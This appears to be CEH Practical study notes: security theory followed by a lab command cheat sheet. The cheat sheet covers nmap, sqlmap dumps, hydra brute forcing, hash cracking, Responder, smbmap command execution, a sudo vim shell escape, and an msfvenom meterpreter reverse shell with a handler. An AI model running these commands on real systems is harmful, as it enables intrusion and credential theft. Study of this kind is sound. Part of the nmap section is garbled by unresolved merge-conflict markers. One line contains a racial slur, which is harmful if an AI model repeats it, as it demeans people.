View all the content: https://github.com/TheCyberpunker/CEH-Practical-Notes

What is an Ethical Hacker?

The Ethical Hacker is an individual who is usually employed with the organization and who can be trusted to undertake an attempt to penetrate networks and/or computer systems using the same methods as a Hacker. Hacking is a felony in some countries. When it is done by request and under a contract between and Ethical Hacker and an organization, it is legal. The most important point is that an Ethical Hacker has authorization to probe the target.

A Certified Ethical Hacker is a skilled professional who understands and knows how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker.

What is Information Security?

Information security refers to the protection or safeguarding of information and information systems that use, store, and transmit information from unauthorized access, disclosure, alteration and destruction. Information is a critical asset that organizations must secure. If sensitive information falls into the wrong hands, then the respective organization may suffer huge losses in terms of finances, brand reputation, customers, or in others ways.

Elements of Information Security

Information security is the state of the well-being of information and infrastructure in which the possibility of the theft, tampreing, or disruption of information and services is kept low or tolerable. It relies on five major elements: confidentiality, integrity, availability, authenticity and non-repudiation.

• #### Confidentiality.
  Confidentiality is the assurance that the information is accessible only to authorized.
• #### Integrity
  Integrity is the trustworthiness of data or resources in the prevention of improper and unauthorized changes – the assurance that information is sufficiently accurate for its purpose.
• #### Availability
  Availability is the assurance that the systems responsible for delivering, storing and processing information are accessible when required by authorized users.
• #### Authenticity
  Authenticity refers to the characteristic of communication, documents, or any data that ensures the quality of being genuine or uncorrupted. The major role of authentication is to confirm that a user is genuine.
• #### Non-Repudiation
  Non-repudiation is a way to guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message. Individuals and organizations use digital signatures to ensure non-repudiation.

Classification of Attacks

According to IATF (Information Assurance Technical Framework), security attacks are classified into five categories: passive, active, close-in, insider and distribution.

• #### Passive Attacks
  • Passive attacks do not tamper with the data and involve intercepting and monitoring network traffic and data flow on the target network.
  • Examples include sniffing and eavesdropping (listen from hidden).
• #### Active Attacks
  • Active attacks tamper with the data in transit or disrupt the communication or services between the systems to bypass or break into secured systems
  • Examples include DoS, Man-in-the-Middle, session hijacking, and SQL injection.
• #### Close-in Attacks
  • Close-in attacks are performed when the attacker is in close physical proximity with the target system or network in order to gather, modify, or disrupt access to information.
  • Examples include social engineering such as eavesdropping, shoulder surfing, and dumpster diving (search in the garbage).
• #### Insider Attacks
  • Insider attacks involve using privileged access to violate rules or intentionally cause a threat to the organization’s information or information systems.
  • Examples include theft of physical devices and planting keyloggers, backdoors, and malware.
• #### Distribution Attacks
  • Distribution attacks occur when attackers tamper with hardware or software prior to installation.
  • Examples attackers tamper with the hardware or software at its source or in transit.

Cyber Kill Chain Methodology

The cyber kill chain is an efficient and effective way of illustrating how an adversary can attack the target organization.

Methodology:

• #### Reconnaissance:
  Gather data on the target to probe for weak points.
• #### Weaponization:
  Create a deliverable malicious payload using an exploit and a backdoor.
• #### Delivery:
  Send weaponized bundle to the victim using email, USB…
• #### Exploitation:
  Exploit a vulnerability by executing code on the victim’s system.
• #### Installation:
  Install malware on the target system.
• #### Command and Control:
  Create a command and control channel to communicate and pass data back and forth.
• #### Actions on Objectives:
  Perform actions to achieve intended objectives and goals.

Tactics, Techniques, and Procedures (TTPs)

The terms tactics, techniques, and procedures refer to the patterns of activities and methods associated with specific threat actors or groups of threat actors.

• #### Tactics:
  Tactics are the guidelines that describe the way an attacker advanced persistent threat (APT) performs the attack from beginning to the end.
• #### Techniques:
  Techniques are the technical methods used by an attacker to achieve intermediate results during the attack.
• #### Procedures:
  Procedures are organizatonial approaches that threat actors follow to launch an attack.

Adversary Behavioral Identification

Adversary behavioral identification involves the identification of the common methods or techniques followed by and adversary to launch attacks to penetrate and organization’s network.

• #### Internal Reconnaissance
  Once the adversary is inside the target network, they follow various techniques and methods to carry out internal reconnaissance.
• #### Use of PowerShell
  PowerShell can be used by an adversary as a toll for automating data exfiltration and launching further attacks.
• #### Unspecified Proxy Activities
  An adversary can create and configure multiple domains pointing to the same host, thus, allowing an adversary to switch quickly between the domains to avoid detection.
• #### Use of Command-Line Interface
  On gaining access to the target system, an adversary can make use of the command-line interface to interact with the target system, browse the files, read file content, modify file content, create new accounts, connect to the remote system, and download and install malicious code.
• #### HTTP User Agent
  In HTTP-based communication, the server identifies the connected HTTP client using the user agent field.
• #### Command and Control Server
  Adversaries use command and control servers to communicate remotely with compromised systems through an encrypted session.
• #### Use of DNS Tunneling
  Adversaries use DNS tunneling to obfuscate malicious traffic in the legitimate traffic carried by common protocols used in the network.
• #### Use of Web Shell
  And adversary uses a web shell to manipulate the web server by creating a shell within a website; it allows an adversary to gain remote access to the functionalities of a server.
• #### Data Staging
  After successful penetration into a target’s network, the adversary uses data staging techniques to collect and combine as much data as possible.

Indicator of Compromise (IoCs)

Indicators of compromise are the clues, artifacts, and pieces of forensic data that are found on a network or operating system of an organization that indicate a potential intrusion or malicious activity in the organization’s infrastructure.
Cyber Threats are continuously evolving with the newer TTPs adapted based on the vulnerabilities of the target organization. Security professionals must perform continuous monitoring of IoCs to effectively and efficiently detect and respond to evolving cyber threats.

Categories of Indicators of Compromise

The cybersecurity professionals must have proper knowledge about various possible threat actors and their tactics related to cyber threats, mostly called (IoCs). For this purpose, IoCs are divided into four categories:

• #### Email Indicators
  Attackers usually prefer email services to send malicious data to the target organization or individual.
• #### Network Indicators
  Network indicators are useful for command and controls, malware delivery, and identifying details about the operating system, browser type, and other computer specific information.
• #### Host-Based indicators
  Host-Based indicators are found by performing an analysis of the infected system within the organizational network.
• #### Behavioral Indicators
  Generally, typical IoCs are useful for identifying indications of intrusion, such as malicious IP addresses, virus signatures, MD5 hash, and domain names.

Hacking Concepts

Hacking in the field of computer security refers to exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to system resources.

Who is a Hacker?

• An intelligent individual with excellent computer skills who can create and explore computer software and hardware.
• For some hackers, hacking is a hobby to see how many computers or networks they can compromise.
• Some hacker’s intentions can either be to gain knowledge or to probe and do illegal things

Hackers Classes

Hackers usually fall into one of the following categories, according to their activities:

• Black Hats: Illegal or malicious purposes.
• White Hats: Defensive or for good purposes.
• Gray Hats: Work in two sides offensively and defensively.
• Suicide Hackers: They give a shit the consequences of their actions.
• Script Kiddies: People who use tools made by real hackers they are (fake hackers).
• Cyber Terrorists: Motivated by religious or political beliefs.
• State-Sponsored Hackers: Contractors by governments for hack other governments.
• Hacktivist: Hacktivist is when hackers break into government or corporate computer systems as an act of protest.

Hacking Phases

In general, there are five phases of hacking:

• #### Reconnaissance:
  Reconnaissance refers to the preparatory phase in which an attacker gathers as much information as possible about the target prior to launching the attack.
  • Reconnaissance Types:
    • Active: Involve direct interactions with the target system by using tools to detect open ports, host, router locations, VoIP calls, among others.
    • Passive: They do not interact with the target directly. Relies on publicly available information (OSINT).
• #### Scanning:
  Scanning is the phase immediately preceding the attack. The attacker uses the details gathered during reconnaissance to scan the network for specific information.
  • Pre-attack phase: Scanning refers to the pre-attack phase when the attacker scans the network for specific information based on information gathered during reconnaissance.
  • Port Scanner: Scanning can include the use of dialers, port scanners, network mappers, ping tools, and vulnerabilty scanners.
  • Extract Information: Attackers extract information such as live machines, port, port status, OS details, device type and system uptime to launch attack.
• #### Gaining Access:
  • Gaining access refers to the point where the attacker obtains access to the operating system or applications on the target computer or network.
  • The attacker can gain access at the operating system, application, or network levels.
  • Can [[What is Privilege Escalation? | escalate privileges]] to obtain complete control of the system. In this process, the target’s connected intermediate systems are also compromised.
  • Examples include password cracking, buffer overflows, denial of service, and session hijacking
• #### Maintaining Access:
  • Maintaining access refers to the phase when the attacker tries to retain their ownership on the system.
  • Attackers may prevent the system from being owned by other attackers by securing their exclusive access with backdoors, rootkits, or trojans.
  • Attackers can upload, download, or manipulate data, applications, and configurations on the owned system.
  • Attackers use the compromised system to launch further attacks.
• Clearing Tracks:
  • Clearing tracks refers to the activities carried out by an attacker to hide malicious acts.
  • The attacker’s intentions include obtaining continuing access to the victim’s system, remaining unnoticed and uncaught, and deleting evidence that might lead to their prosecution.
  • The attacker overwrites the server, system, and application logs to avoid suspicion.
  Why Ethical Hacking is Necessary Ethical hacking is necessary as it allows for counter attacks against malicious hackers through anticipating the methods used to break into the system.
  • To prevent hackers from gaining access to the organization’s information systems.
  • To uncover vulnerabilities in systems and explore their potential as a security risk.
  • To analyze and strengthen an organization’s security posture, including policies, network protection infrastructure, and end-user practices.
  • To provide adequate preventive measures in order to avoid security breaches.
  • To help safeguard customer data.
  • To enhance security awareness at all levels in a business.

Scope and Limitations of Ethical Hacking

Scope:

• Ethical hacking is a crucial component of risk assessment, auditing, counter fraud, and information systems security best practices.
• It is used to identify risk and highlight remedial actions. It also reduces ICT (Information and Communications Technology) cost by resolving vulnerabilities.

Limitations:

• Unless the businesses already know what they are looking for and why the are hiring an outside vendor to hack systems in the first place, chances are there would not be much to gain from the experience.
• An ethical hacker can only help the organization to better understand its security system; it is up to the organization to place the right safeguards on the network.

Skills of an Ethical Hacker

It is essential for an ethical hacker to acquire the knowledge and skills to become an expert hacker and to use this knowledge in a lawful manner. The technical and non-technical skills to be a good ethical hacker are discussed below:

• #### Technical Skills:
• In-depth knowledge of major operating environments, such as Windows, Unix, Linux, and Macintosh.
• In-depth knowledge of networking concepts, technologies, and related hardware and software.
• A computer expert adept at technical domains.
• The knowledge of security areas and related issues.
• High technical knowledge of how to launch sophisticated attacks.
• #### Non-Technical Skills
• The ability to quickly learn and adapt new technologies.
• A strong work ethic and good problem solving and communication skills.
• Commitment to an organization’s security policies.
• An awareness of local standards and laws.

Information Security Controls

Information security controls prevent the occurrence of unwanted events and reduce risk to the organization;s information assets. The Basic security concepts critical to information on the internet are CIA confidentiality, integrity and availability. The concepts related to the persons accessing the information are authentication, authorization, and non-repudiation.

Information Assurance (IA)

• IA refers to the assurance that the integrity, availability, confidentiality, and authenticity of information and information systems is protected during the usage, processing, storage, and transmission of information.
• Some of the processes that help in achieving information assurance include:
• Developing local policy, process, and guidance.
• Designing network and user authentication strategies.
• Identifying network vulnerabilities and threats.
• Identifying problem and resource requirements.
• Creating plans for identified resource requirements.
• Applying appropriate information assurance controls.
• Performing certification and accreditation.
• Providing information assurance training.

Defense-in-Depth

• Defense-in-depth is a security strategy in which several protection layers are placed throughout an information system.
• It helps to prevent direct attacks against the system and its data because a break in one layer only leads the attacker to the next layer.

What is Risk?

Risk refers to the degree of uncertainty or expectation of potential damage that an adverse event may cause to the system or its resources, under specified conditions.

• Risk Level Risk level is an assessment of the resulted impact on the network.
• #### Risk Matrix
  The risk matrix scales the risk occurrence or likelihood probability, along with its consequences or impact.
• #### Risk Management
  Risk management is the process of reducing and maintaining risk at an acceptable level by means of a well-defined and actively employed security program.
• #### Risk Management Phases:
• #### Risk Identification:
  Identifies the sources, causes, consequences, and other details of the internal and external risks affecting the security of the organization.
• #### Risk Assessment:
  Assesses the organization's risk and provides an estimate of the likelihood and impact of the risk.
• #### Risk Treatment:
  Selects and implements appropriate controls for the identified risks.
• #### Risk Tracking:
  Ensures appropriate controls are implemented to handle known risks and calculates the chances of a new risk occurring.
• #### Risk Review:
  Evaluates the performance of the implemented risk management strategies.

Cyber Threat Intelligence

According to the Oxford dictionary, a threat is defined as “the possibility of a malicious attempt to damage or disrupt a computer network or system.” A threat is a potential occurrence of an undesired event that can eventually damage and interrupt the operational and functional activities of an organization. A threat can affect the integrity and availability factors of an organization. The impact of threats is very great and may affect the state of the physical IT assets in an organization. The existence of threats may be accidental, intentional, or due to the impact of some action.

Types of Threat Intelligence

Threat intelligence is contextual information that describes threats and guides organizations in making various business decisions. It is extracted from a huge collection of sources and information.

• #### Strategic:
  High level information on changing risks.
  Consumed by high level executives and management.
• #### Tactical:
  Information on attacker’s TTPs.
  Consumed by IT service and SOC Managers, administrators.
• #### Operational:
  Information on a specific incoming attack.
  Consumed by security managers and network defenders.
• #### Technical
  Information on specific indicators of compromise.
  Consumed by SOC staff and IR teams.

Thread Modeling

Threat modeling is a risk assessment approach for analyzing the security of an application by capturing, organizing, and analyzing all the information that affects the security of an application.

Threat Modeling Process

• #### Identify Security Objectives:
  Helps to determine how much effort needs to be put toward subsequent steps
• #### Application Overview:
  Identify the components, data flows, and trust boundaries
• #### Decompose the Application:
  Helps to find more relevant and more detailed threats
• #### Identify Threats:
  Identify threats relevant to the control scenario and context using the information
  obtained in steps 2 and 3
• #### Identify Vulnerabilities:
  Identify weaknesses related to the threats found using vulnerability categories

Incident Management

Incident management is a set of defined processes to identify, analyze, prioritize, and resolve security incidents to restore the system to normal service operations as soon as possible, and prevent recurrence of the incident.

Incident management includes the following:

• Vulnerability analysis
• Artifact analysis
• Security awareness training
• Intrusion detection
• Public or technology monitoring

The incident management process is designed to:

• Improve service quality
• Resolve problems proactively
• Reduce the impact of incidents on an organization or its business
• Meet service availability requirements
• Increase staff efficiency and productivity
• Improve user and customer satisfaction
• Assist in handling future incidents

Incident Handling and Response

Incident handling and response (IH&R) is the process of taking organized and careful steps when reacting to a security incident or cyber attack. It is a set of procedures, actions, and measures taken against and unexpected event occurrence. It involves logging, recording, and resolving incidents that take place in the organization. It notes the incident, when it occurred, its impact, and its cause.

Steps involved in the IH&R process:

• #### Preparation:
  The preparation phase includes performing an audit of resources and assets to determine the purpose of security and define the rules, policies and procedures that drive the IH&R process.
• #### Incident recording and assignment:
  In this phase, the initial reporting and recording of the incident take place.
• #### Incident Triage:
  In this phase, the identified security incident are analyzed, validated, categorized, and prioritized.
• #### Notification:
  in the notification phase, the IH&R team informs various stakeholders, including management, third-party vendors, and clients, about the identified incident.
• #### Containment:
  This phase helps to prevent the spread of infection to other organizational assets, preventing additional damage.
• #### Evidence gathering and forensic analysis:
  In this phase, the IH&R team accumulates all possible evidence related to the incident and submits it to the forensic department for investigation.
• #### Eradication:
  In the eradication phase, the IH&R team removes or eliminates the root cause of the incident and closes all the attack vectors to prevent similar incident in the future.
• #### Recovery:
  After eliminating the causes for the incidents, the IH&R team restores the affected systems, services, resources, and data through recovery.
• #### Post-incident Activities:
• Once the process is complete, the security incident requires additional review and analysis before closing the matter.
• Incident documentation
• Incident impact assessment
• Reviewing and revising policies
• Closing the investigation
• Incident disclosure

Role of AI and ML in Cyber Security

Machine learning (ML) and Artificial intelligence (AI) are now popularly used across various industries and applications due to the increase in computing power, data collection, and storage capabilities.

What are AI and ML?

Artificial Intelligence A huge amount of collected data is fed into the AI, which processes and analyzes it to understand its details and trends.
Machine Learning is a branch of artificial intelligence (AI) that gives the systems the ability to self-learn without any explicit programs.
There are two types of ML classification techniques:

• #### Supervised learning:
  Supervised learning uses algorithms that input a set of labeled training data to attempt to learn the differences between the given labels.
• #### Unsupervised learning:
  Unsupervised learning makes use of algorithms that input unlabeled training data to attempt to reduce all the categories without guidance.

Information Security Laws and Standards

Laws are a system of rules and guidelines that are enforced by a particular country or
community to govern behavior. A Standard is a “document established by consensus and approved by a recognized body that provides, for common and repeated use, rules, guidelines, or characteristics for activities or their results, aimed at the achievement of the optimum degree of order in a given context”.

Payment Card Industry Data Security Standard (PCI DSS)

Source: https://www.pcisecuritystandards.org
The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle cardholder information for the major debit, credit, prepaid, e-purse, ATM, and POS cards. This standard offers robust and comprehensive standards and supporting materials to enhance payment card data security. These materials include a framework of specifications, tools, measurements, and support resources to help organizations ensure the safe handling of cardholder information.

PCI Data Security Standard – High Level Overview

• #### Build and Maintain a Secure Network:
• Install and maintain a firewall configuration to protect cardholder data.
• Do not use vendor-supplied defaults for system passwords and other security parameters
• #### Protect Cardholder Data:
• Protect stored cardholder data
• Encrypt transmission of cardholder data across open, public networks
• #### Maintain a Vulnerability – Management Program:
• Use and regularly update anti-virus software or programs
• Develop and maintain secure systems and applications
• #### Implement Strong Access – Control Measures:
• Restrict access to cardholder data by business need to know
• Assign a unique ID to each person with computer access
• Restrict physical access to cardholder data
• #### Regularly Monitor and Test -Networks:
• Track and monitor all access to network resources and cardholder data
• Regularly test security systems and processes
• #### Maintain an Information – Security Policy:
• Maintain a policy that addresses information security for all personnel

ISO/IEC 27001:2013

ISO/IEC 27001:2013 specifies the requirements for establishing, implementing, maintaining, and continually improving an information security management system within the context of an organization. It includes requirements for the assessment and treatment of information security risks tailored to the needs of the organization.

The regulation is intended to be suitable for several different uses, including:

• Use within organizations to formulate security requirements and objectives
• Use within organizations as a way to ensure that security risks are cost-effectively
  managed
• Use within organizations to ensure compliance with laws and regulations
• Defining new information security management processes
• Identifying and clarifying existing information security management processes
• Use by the management of organizations to determine the status of information
  security management activities
• Implementing business-enabling information security
• Use by organizations to provide relevant information about information security to
  customers

Health Insurance Portability and Accountability Act (HIPAA)

The HIPAA Privacy Rule provides federal protections for the individually identifiable health information held by covered entities and their business associates and gives patients an array of rights to that information. At the same time, the Privacy Rule permits the disclosure of health information needed for patient care and other necessary purposes.

The office of civil rights implemented HIPAA’s Administrative Simplification Statute and Rules,
as discussed below:

• #### Electronic Transactions and Code Set Standards:
  Transactions are electronic exchanges involving the transfer of information between
  two parties for specific purposes. The Health Insurance Portability and Accountability
  Act of 1996 (HIPAA) designated certain types of organizations as covered entities, including health plans, health care clearinghouses, and certain health care providers.
• #### Privacy Rule
  The HIPAA Privacy Rule establishes national standards to protect people’s medical
  records and other personal health information and applies to health plans, health care
  clearinghouses, and health care providers that conduct certain health care transactions electronically.
• #### Security Rule
  The HIPAA Security Rule establishes national standards to protect individuals’ electronic personal health information that is created, received, used, or maintained by a covered entity.
• #### Employer Identifier Standard
  The HIPAA requires that each employer has a standard national number that identifies
  them on standard transactions.
• #### National Provider Identifier Standard (NPI)
  The National Provider Identifier (NPI) is a HIPAA Administrative Simplification Standard. The NPI is a unique identification number assigned to covered health care providers.
• #### Enforcement Rule
  The HIPAA Enforcement Rule contains provisions relating to compliance and investigation, as well as the imposition of civil monetary penalties for violations of the HIPAA Administrative Simplification Rules and procedures for hearings.

Sarbanes Oxley Act (SOX)

Source: https://www.sec.gov
Enacted in 2002, the Sarbanes-Oxley Act aims to protect the public and investors by increasing the accuracy and reliability of corporate disclosures. This act does not explain how an organization must store records but describes the records that organizations must store and the duration of their storage. The Act mandated several reforms to enhance corporate responsibility, enhance financial disclosures, and combat corporate and accounting fraud.

The Digital Millennium Copyright Act (DMCA)

Source: https://www.copyright.gov
The DMCA is an American copyright law that implements two 1996 treaties from the World Intellectual Property Organization (WIPO): the WIPO Copyright Treaty and the WIPO Performances and Phonograms Treaty. In order to implement US treaty obligations, the DMCA defines legal prohibitions against circumvention of the technological protection measures employed by copyright owners to protect their works, and against the removal or alteration of copyright management information.

Cyber Law in Different Countries

Cyberlaw or Internet law refers to any laws that deal with protecting the Internet and other online communication technologies. Cyberlaw covers topics such as Internet access and usage, privacy, freedom of expression, and jurisdiction. Cyber laws provide an assurance of the integrity, security, privacy, and confidentiality of information in both governmental and private organizations. These laws have become prominent due to the increase in Internet usage around the world. Cyber laws vary by jurisdiction and country, so implementing them is quite challenging. Violating these laws results in punishments ranging from fines to imprisonment.

Commands – tips – tools.

Commands

•  Hashcal calcula el hash de un archivo
•  Rcalc a nivel de consola
•  Sacar base de datos : sqlmap
•  Escaneo tcp nmap, Tcp mas info
•  scan pcap files or network wireshark, tshark

Tips

•  Banner grabing
•  Aprender sobre rainbow tables hashcat
•  unicorn scan os discovery
•  snpm on nmap and msfconsole
•  use of nikto parrot y nessus windows
•  aprender escaneo tcp udp arp
•  saber que maquinas hay en la red
•  Scaneo mediante icmp
•  ecanear la red y revisar los puertos abiertos con nmap y filtrar los puertos
•  te dan un hash, cual es la contraseña ontenida en tal parte (Comparar hashes Hash-identifier)
•  Dicionario: Rockyou pero el seclist
•  Rainbow tables
•  Md5 checksunq
•  Ssrf cambiando id=1 por Id=2
•  Wireshark filtear por metodo post
•  Ipv6 enumeration

Tools

•  wireshark
•  hash-identifier, hashid
•  netdiscover (para ver la red o mapearla) <<
•  nmap (para ip, sistema, versiones, puertos)
•  hash-identifier – hashid (para conocer la encriptacion de un hash)
•  john de ripper (para crackear la contrasena del hash)
•  wpscan (para hacer enumeracion de wordpress, usuarios, plugins, fuerza bruta …)
•  cewl (para hacer diccionarios en base a texto de la pagina a hackear)
•  sqlmap (para enumerar bases de datos)
•  netdiscover (parrot 🦜)
•  stego, hydra
•  Nikto
•  NMAP
•  SQLMap
•  Hydra
•  Wireshark
•  Veracrypt
•  Hashcalc
•  rcalc
•  Dirb
•  Steghide
•  Searchsploit
•  Hashcat
•  John
•  WPSCAN
•  Metasploit
•  rainbow-tables
•  metasploit
•  metasploit android
•  stego windows
•  wireshark filters
•  wordpress

CEH Practical Notes

• Footprinting
• Scanning
• Enumeration
• Vulnerability Analysis
• System Hacking Gaining Access
• Cracking passwords
• Vulnerability Exploitation Escalating Privileges Maintaining Access
• Executing Applications
• Hiding Files Clearing Logs
• Covering Tracks

Online Resources

• videos – mega
• Ethical hacking labs writeup – git
• Meet -CEHv11 lab videos

Enumeration

host enumation

host and service enumeration

//discover devices inside the network eth0
netdiscover -i eth0
nmap -sN 10.10.10.0/24
// enumeration
netstat -a 10.10.10.10 // netstat enumeration netbios
snmp-check 10.10.10.10 // extract users from netbios - parrot
enum4linux

sudo nmap -vv -p 1-1000 -sC -A 10.10.10.10 -oN nmap_scan
nmap -p- -sS -min-rate 10000 -Pn -n 10.10.10
nmap -6 www.scanme.com // scan IPV6
nmap -sC -sV -vvv -T5 -p 80,21,2222 10.10.10
sudo nmap -v -sV -sC
nmap -Pn -sS -n 10.10.. -T4 -oN nmap_scan // [prefer] fast scan ufo mode
nmap -v -p- -sV -sC -T4 10.10 -oN nmap_scan // UDP/TCP scanning
sudo nmap -p- -Pn -vvv -sS 10.10.. -oN nmap_scan
nmap -sS -sV -A -O -Pn
nmap -sV -sT -sU -A 10.10.. -oN nmap_scan
sudo nmap -p- 10.10.. --open -oG nmap/AllPorts -vvv -Pn -n -sS
sudo nmap -p22,80 -sV -sC -Pn -n 10.10.. -oN nmap/openports -vvv
nmap -sV -p 22,443 10.10../24 // scan mi net 24
nmap -sU -p 161 -sV -sC 10.10.. // UDP Scan
nmap -A --min-rate=5000 --max-retries=5 10.10.. // optimize scan time
<<<<<<< HEAD
nmap -Pn -sS -A -oX test 10.10.10.0/24 // Scanning the network and subnet

-PR = ARP ping scan
-PU = UDP ping scan
=======
nmap -Pn -sS -A -oX test 10.10.../24 // scanning network subnet

//scripts
snmp //extract users of the network port 161

-PR = ARP ping scan
-PE = ICMP scan echo
-PU = UDP ping scan
-oX = save XMl
>>>>>>> df364a4f409faf7bc6bb4b291db58d3dcabb2bb9
-vv = verbose
-p = ports
-sC = default scripts
-A = agressive scan
-oN = save in a file
-sS = syn scan is untrusive because don't complete the petitions
-n = no resolution of dns
-p- = all ports
-sV = Probe open ports to determine service/version inf
-T4 = Timing scanning <1-5>
-o = output to save the scan
-sT = TCP port scan
-sU = UDP port scan
-A = Agressive/ OS detection  
--open = all ports open
-oG = save in a grep format
-Pn = no do ping to the ip
-n = dont resolve domain names
--max-retries = 1 default verify 10 times.
-O = verifica el sistema operativo

// My niggerian methodology
nmap -sV -sC nmap 10.10.10.x #top1000ports
nmap -sC -sV -v -oN nmap.txt
masscan -e tun0 -p1-65535 -rate=1000 <ip>
sudo nmap -sU -sV -A -T4 -v -oN udp.txt ip

default ports

port	name
3306	mysql –script mysql-info mysql-enum
3389	rdp port remote port
25	smtp mail
80	http
443	https
20	ftp
23	telnet
143	imap
22	ssh
53	dns

Commom ports DB

database ports
port database

1521 - oracle

#!/usr/bin/bash
while read ip;
do echo "nmap -n -Pn -sS -g 53 --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 $service [$ip](https://twitter.com/search?q=%24ip&src=cashtag_click) -oN [$ip](https://twitter.com/search?q=%24ip&src=cashtag_click)-tcp.txt" >> cmd_tcp.txt done < live_hosts.txt

Web Enumeration

// dir enumeration
gobuster dir -u 10.10.. -w /usr/share/wordlists/dirb/common.txt -t 50 -x php,html,txt -q

dir : directory listing
-u : host
-w : wordlists
-t : threads int / Number of concurrent threads (default 10)
-x : enumerate hidden files htm, php
-q : –quiet / Don’t print the banner and other noise

// wordpress enumeration
wpscan --url https://localchost.com --passwords=
wpscan -u 10.10.. -e u vp
wpscan -u 10.10.. -e u --wordlist path/rockyou.txt //bruteforce

-e = enumerate
u = enumerate usernames
vp = vulnerable plugins

// wordlist generation
cewl -w wordlist -d 2 -m 5 http://wordpress.com
-d = deeph of the scanning
-m = long of the words
-w = save to a file worlist

web explotation

// sql injection
sqlmap -u http://10.10.197.40/administrator.php --forms --dump

-u = url
--forms = grab the forms /detect
--dump = retrieve data form de sqli

#### basic sqli injection
sqlmap -u 10.10.77.169 --forms --dump

- u = url
- --forms= check the forms automatically
- --dump= dump dthe database data entries

// extract database
sqlmap -u http://localchost.com/hey.php?artist=1 --dbs
// extract colums
Sqlmap -u http://localchost.com/hey.php?artist=1 --D (tabla) --T artists --columns
// extract data of the table and the column inside of the db
sqlmap -u http://localchost.com/hey.php?artist=1 --D (tabla) --T artist --C adesc, aname, artist_id --dump

enumeration

enum4linux 10.10.60.11

bruteforcing

hydra -t4 -l lin -P /usr/share/wordlists/rockyou.txt ssh:10.10.149.11
hydra -l lin -P /usr/share/wordlists/rockyou.txt ssh:10.10.149.118

stego

exiftool cats.png
zsteg cats.png
binwalk -d cats.png

// windows
snow -C -p "magic" readme2.txt // IMPORTANTISIMO
-p = passowrd
//image steganography
openstego > extract dat > 

//stegseek to crack stego password

windows rpc mal configurado

rpcclient 10.10.123.10

hashcracking

hashcat

hashcat -O -w3 -m 0 56ab24c15b72a457069c5ea42fcfc640 /usr/share/wordlists/rockyou.txt --show

-m = type of hash
-a = attack mode (1-3) 3 bruteforcing
--show = mostrar hash crackeado

hashcat -O -A 0 -m 20 salt12314124:passowrdmd523432 /usr/share/worlist/rockyou.txt
hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt --show

john

john --format=Raw-MD5 hash --wordlist=/usr/share/wordlists/rockyou.txt

- --format = hash format '--list=formats | grep MD5'
- hash = file - echo '123213dasd' >> hash
- wordlist= = wordlist to crack

### to show the hash cracked
john --show --format=Raw-MD5 hash

- --show = show the hash:Cracked

cryptography

//HashCalc
take a file and open into hashcalc
i will give you the the hash for md5 or other algorithms

// MD5 calculator
it will compare both files what we need get the md5

// HashMyFiles
it allow you to hash all the files inside a folder

// Veracrypt

rainbowtables

Rainbowtables are already hash with password to perform cracking without calculate a new hash.
// linux
rtgen // rainbowcrack
rtgen sha256 loweralpha-numeric 1 10 0 1000 4000 0 // generate a new rainbow table
// windows
rtgen md5 loweralpha-hnumeric 1 4 1 1000 1000 0 //
then use app rainbowcrack // add the hashes and the rainbow table option

Enumerating – Samba

search for commands
smbmap --help | grep -i username

smbmap -u "admin" -p "passowrd" -H 10.10.10.10 -x "ipconfig"
-x = command

wireshark

### wireshark filters

// filters by post
http.request.method==POST
smtp // email
pop // email
dns.qry.type == 1 -T fields -e dns.qry.name = show records present in this pcap
dns.flags.response == 0 = There are 56 unique DNS queries.
tcp // show tcp packets
//find packets
edit > find packets > packet list : packet bytes > case sensitive: strings > string "pass" :search

//DDOS ATTACK
look number of packets first column
then >statistics > ipv4 statistics > destination and ports

/// tshark cli
tshark -r dns.cap | wc -l //count how many packets are in a capture
tshark -r dns.cap -Y "dns.qry.type == 1" -T fields -e dns.qry.name //show records present in this pcap
tshark -r dnsexfil.pcap -Y "dns.flags.response == 0" | wc -l 
tshark -r pcap -T fields -e dns.qry.name | uniq | wc -l //There are 56 unique DNS queries.
tshark -r pcap | head -n2 //DNS server side to identify 'special' queries
tshark -r pcap -Y "dns.flags.response == 0" -T fields -e "dns.qry.name" | sed "s/.m4lwhere.org//g" | tr -d "\n" `exfiltrate data with regx`

Privilege scalation reverse shell

ssh -p 2222 [email protected]
sudo -ls ###list de su permisions

sudo vim -c ':!/bin/sh' ### privilege scalation

https://gtfobins.github.io/

other

hydra -l root -P passwords.txt [-t 32] ftp
hydra -L usernames.txt -P pass.txt mysql
hashcat.exe -m hash.txt rokyou.txt -O
nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput 0.10.10 
wpscan --url https://10.10.10.10 --enumerate u
netdiscover -i eth0
john --format=raw-md5 password.txt [ To change password to plain text ]

vulnerability scanning

nikto -h url -Cgidirs all

System hacking

// 1 - on a windows machine
wmic useraccount get name,sid //list users
// using a tool
Pwdump7.exe >> /path/file.txt //get a file to crack
// using ophcrack to crack the hash with rainbow tables
ophcrack >> tables >> vista free
// cracking with rainbow tables using winrtgen to create a rainbow table
winrtgen >> add table >> hashntlm
rainbowcrack >> select the obtained file >> select dircreatd with winrtgen

// 2 - using responder to capture the traffic of the windows system
//run a shared folder on windows
//capture the ntlm hash >> cracking with jhon
chmod +x responder.py
./Responder.py -I eth0
-I = interface //ifconfig
// cracking the ntlm capture with ntlm
john capture.txt

lopthcr4ck // helps to crack ntlm passwords store on windows

// system hacking windows
// look for an exploit and try to get remote access to the victim using msfvnom,metasploit and rat

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=my.ip LPORT=my.port -o /root/Desktop/test.exe
-p = payload
--platform = Os
-a = architecture
-f = format of the payload
-o = output dir

// now with try to share the file with the victim
// we try three forms
// #1 - option
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
// copy the text.exe to the new server
cp /root/Desktop/test.exe /var/www/html/share
// #2 - option
python -m SimpleHttpServer 80
// #3 - option
python3 http.server 80
// start the serverwith apache
service apache2 start //apache version
//now we open msfconsole to gain a inverse shell with meterpreter
use exploit/multi/handler //similar to nc -nlvp .port
set payload windows/meterpreter/reverse_tcp
set LHOST my.ip
